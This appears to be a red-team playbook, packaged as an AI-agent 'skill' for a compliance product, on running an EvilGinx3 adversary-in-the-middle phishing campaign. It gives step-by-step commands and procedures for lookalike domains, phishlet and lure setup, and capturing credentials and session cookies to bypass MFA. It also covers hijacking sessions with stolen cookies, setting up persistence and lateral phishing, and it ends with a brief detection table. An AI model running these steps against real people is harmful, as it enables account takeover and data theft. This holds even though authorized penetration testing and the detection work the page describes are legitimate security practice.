Performing Initial Access with EvilGinx3
Overview
EvilGinx3 is a man-in-the-middle attack framework used for phishing login credentials along with session cookies, enabling bypass of multi-factor authentication (MFA). Unlike traditional credential phishing that only captures usernames and passwords, EvilGinx3 operates as a transparent reverse proxy between the victim and the legitimate authentication service, intercepting the full authentication flow including MFA tokens and session cookies. This makes it the primary tool for red teams demonstrating the risk of adversary-in-the-middle (AiTM) attacks against organizations relying solely on MFA for protection.
Objectives
- Deploy EvilGinx3 with custom phishlets targeting authorized scope
- Configure DNS and SSL certificates for the phishing domain
- Capture session tokens that bypass MFA protections
- Import stolen session cookies into a browser to hijack authenticated sessions
- Integrate with GoPhish or custom delivery mechanisms for phishing email campaigns
- Document the complete attack chain from phishing email to authenticated access
MITRE ATT&CK Mapping
- T1566.002 - Phishing: Spearphishing Link
- T1557 - Adversary-in-the-Middle
- T1539 - Steal Web Session Cookie
- T1078 - Valid Accounts
- T1556 - Modify Authentication Process
- T1550.004 - Use Alternate Authentication Material: Web Session Cookie
Implementation Steps
Phase 1: Infrastructure Setup
- Register a convincing lookalike domain (e.g., using homoglyphs or typosquatting)
- Provision a VPS and point the domain's DNS A record to the server IP
- Install EvilGinx3:
```bash
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
make
sudo ./bin/evilginx -p ./phishlets
```
- Configure the domain and IP in EvilGinx3:
```
config domain example-phish.com
config ipv4 <server-ip>
```
- EvilGinx3 automatically provisions Let's Encrypt certificates for configured hostnames
Phase 2: Phishlet Configuration
- Select or create a phishlet for the target service (e.g., Microsoft 365, Google Workspace):
```
phishlets hostname o365 login.example-phish.com
phishlets enable o365
```
- Verify phishlet is active and SSL certificate is issued:
```
phishlets
```
- Create a lure URL for the phishing campaign:
```
lures create o365
lures get-url 0
```
- Optionally configure a redirect URL for post-capture:
```
lures edit 0 redirect_url https://legitimate-site.com
```
Phase 3: Phishing Delivery
- Craft a pretext email with the lure URL embedded
- Use GoPhish or manual SMTP for email delivery:
```
# Integration with EvilGoPhish for combined campaigns
# Provides GoPhish email tracking + EvilGinx3 credential capture
```
- Implement URL masking or shortening if needed for link obfuscation
- Deploy landing page with appropriate social engineering pretext
Phase 4: Session Hijacking
- Monitor EvilGinx3 for captured sessions:
```
sessions
sessions <session-id>
```
- Extract captured session cookies from the session:
```
# Session output includes:
# - Username and password
# - Session cookies (authentication tokens)
# - Custom captured parameters
```
- Import session cookies into a browser using a cookie editor extension:
- Export cookies in JSON format
- Use Cookie-Editor or EditThisCookie browser extension
- Navigate to the target service to validate session hijack
- Establish persistent access by creating application passwords or OAuth tokens
Phase 5: Post-Access Activities
- Enumerate mailbox contents, contacts, and shared drives
- Identify additional targets for lateral phishing
- Check for access to connected cloud applications (SharePoint, Teams, OneDrive)
- Document all captured credentials and access achieved
Tools and Resources
| Tool | Purpose | Platform |
|---|---|---|
| EvilGinx3 | AiTM phishing framework | Linux |
| GoPhish | Phishing campaign management | Cross-platform |
| EvilGoPhish | Combined EvilGinx3 + GoPhish integration | Linux |
| Cookie-Editor | Browser cookie import/export | Browser Extension |
| Modlishka | Alternative AiTM proxy framework | Linux |
| Muraena | Alternative AiTM phishing proxy | Linux |
Phishlet Targets
| Target Service | Phishlet | Captured Data |
|---|---|---|
| Microsoft 365 | o365 | Session cookies, credentials |
| Google Workspace | Session cookies, credentials | |
| Okta | okta | Session tokens, credentials |
| GitHub | github | Session cookies, credentials |
| AWS Console | aws | Session tokens, credentials |
Detection Indicators
| Indicator | Detection Method |
|---|---|
| Newly registered lookalike domains | Domain monitoring and certificate transparency logs |
| SSL certificates for suspicious domains | CT log monitoring (crt.sh, Censys) |
| Unusual login locations after phishing | SIEM correlation of authentication events |
| Session cookie replay from different IP | Conditional access policy alerts |
| AiTM proxy headers in traffic | Network inspection for proxy artifacts |
Validation Criteria
- [ ] EvilGinx3 deployed with valid SSL certificates
- [ ] Phishlet configured and enabled for target service
- [ ] Lure URL generated and accessible
- [ ] Test credentials captured successfully through phishing flow
- [ ] Session cookies captured and validated for MFA bypass
- [ ] Session hijack demonstrated in browser with stolen cookies
- [ ] Post-authentication access to target service confirmed
- [ ] Evidence documented with screenshots and session logs
Compliance Framework Mapping
This skill supports compliance evidence collection across multiple frameworks:
- SOC 2: CC4.1 (Monitoring & Evaluation), CC7.1 (Monitoring)
- ISO 27001: A.14.2 (Secure Development), A.18.2 (Information Security Reviews)
- NIST 800-53: CA-8 (Penetration Testing), RA-5 (Vulnerability Scanning)
- NIST CSF: ID.RA (Risk Assessment), PR.IP (Information Protection)
Claw GRC Tip: When this skill is executed by a registered agent, compliance evidence is automatically captured and mapped to the relevant controls in your active frameworks.
Deploying This Skill with Claw GRC
Agent Execution
Register this skill with your Claw GRC agent for automated execution:
# Install via CLI
npx claw-grc skills add performing-initial-access-with-evilginx3
# Or load dynamically via MCP
grc.load_skill("performing-initial-access-with-evilginx3")Audit Trail Integration
When executed through Claw GRC, every step of this skill generates tamper-evident audit records:
- SHA-256 chain hashing ensures no step can be modified after execution
- Evidence artifacts (configs, scan results, logs) are automatically attached to relevant controls
- Trust score impact — successful execution increases your agent's trust score
Continuous Compliance
Schedule this skill for recurring execution to maintain continuous compliance posture. Claw GRC monitors for drift and alerts when re-execution is needed.